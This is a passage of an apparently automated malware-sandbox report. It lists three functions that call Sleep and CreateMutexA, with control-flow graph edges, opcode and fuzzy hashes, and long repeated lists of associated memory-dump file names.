                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: fc5f884d503cf97fab5ba187d4e0840a7eb4dabf5dc855b2427c56bb7b12c4f1
                                                                                                                                                                                                                                                                            • Instruction ID: 3439965a2239dbee08bc0508457235a07733f50975a532bfaac61f0b4f7b9ee8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc5f884d503cf97fab5ba187d4e0840a7eb4dabf5dc855b2427c56bb7b12c4f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D313931B041449BFF08DB7CDD8DB6DB661EF86310F204218E4149B2D5D7798980A796
                                                                                                                                                                                                                                                                            Function 00F9A54D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 164 f9a54d-f9a56d 168 f9a59b-f9a5b7 164->168 169 f9a56f-f9a57b 164->169 172 f9a5b9-f9a5c5 168->172 173 f9a5e5-f9a604 168->173 170 f9a57d-f9a58b 169->170 171 f9a591-f9a598 call fad663 169->171 170->171 176 f9a944-f9a949 call fc6c6a 170->176 171->168 178 f9a5db-f9a5e2 call fad663 172->178 179 f9a5c7-f9a5d5 172->179 174 f9a632-f9a916 call fa80c0 173->174 175 f9a606-f9a612 173->175 182 f9a628-f9a62f call fad663 175->182 183 f9a614-f9a622 175->183 190 f9a94e 176->190 191 f9a949 call fc6c6a 176->191 178->173 179->176 179->178 182->174 183->176 183->182 194 f9a953-f9a994 Sleep CreateMutexA 190->194 195 f9a94e call fc6c6a 190->195 191->190 198 f9a9a7-f9a9a8 194->198 199 f9a996-f9a998 194->199 195->194 199->198 200 f9a99a-f9a9a5 199->200 200->198
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00F9A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00FF3254), ref: 00F9A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: e5458e229ebefde961ca253e989856e55b0adaa0e6776dc60a9aa58b067b8634
                                                                                                                                                                                                                                                                            • Instruction ID: aabb2cee15dc3e2b0995df3b0cf3da1e28ab4d16cb4d28f60833705af7f08d7b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5458e229ebefde961ca253e989856e55b0adaa0e6776dc60a9aa58b067b8634
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B2312671B041448BFF08DB78DD89B6DB762EFC5324F248218E414DB2D6C7798981A796
                                                                                                                                                                                                                                                                            Function 00F9A682 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 202 f9a682-f9a6a2 206 f9a6d0-f9a6ec 202->206 207 f9a6a4-f9a6b0 202->207 210 f9a71a-f9a739 206->210 211 f9a6ee-f9a6fa 206->211 208 f9a6b2-f9a6c0 207->208 209 f9a6c6-f9a6cd call fad663 207->209 208->209 214 f9a949 208->214 209->206 212 f9a73b-f9a747 210->212 213 f9a767-f9a916 call fa80c0 210->213 216 f9a6fc-f9a70a 211->216 217 f9a710-f9a717 call fad663 211->217 218 f9a749-f9a757 212->218 219 f9a75d-f9a764 call fad663 212->219 220 f9a94e 214->220 221 f9a949 call fc6c6a 214->221 216->214 216->217 217->210 218->214 218->219 219->213 227 f9a953-f9a994 Sleep CreateMutexA 220->227 228 f9a94e call fc6c6a 220->228 221->220 234 f9a9a7-f9a9a8 227->234 235 f9a996-f9a998 227->235 228->227 235->234 236 f9a99a-f9a9a5 235->236 236->234
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00F9A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00FF3254), ref: 00F9A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: 37a616f88223f0c9acde790b51c72243abcc7e16aa6769dd0d87c3cbec803175
                                                                                                                                                                                                                                                                            • Instruction ID: 468b2e44efd43cdea846409d3076670057ccf348d91c53b9f806fb1cadb1dacc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37a616f88223f0c9acde790b51c72243abcc7e16aa6769dd0d87c3cbec803175
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35312671B041449BFF08DBB8DD89B6DB772EFC5320F248218E414972D6C7798980A796
                                                                                                                                                                                                                                                                            Function 00F99ADC Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 238 f99adc-f99ae8 239 f99aea-f99af8 238->239 240 f99afe-f99b27 call fad663 238->240 239->240 242 f9a917 239->242 247 f99b29-f99b35 240->247 248 f99b55-f99b57 240->248 244 f9a953-f9a994 Sleep CreateMutexA 242->244 245 f9a917 call fc6c6a 242->245 252 f9a9a7-f9a9a8 244->252 253 f9a996-f9a998 244->253 245->244 250 f99b4b-f99b52 call fad663 247->250 251 f99b37-f99b45 247->251 254 f99b59-f9a916 call fa80c0 248->254 255 f99b65-f99d91 call fa7a00 call f95c10 call f98b30 call fa8220 call fa7a00 call f95c10 call f98b30 call fa8220 248->255 250->248 251->242 251->250 253->252 256 f9a99a-f9a9a5 253->256 256->252
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00F9A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00FF3254), ref: 00F9A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
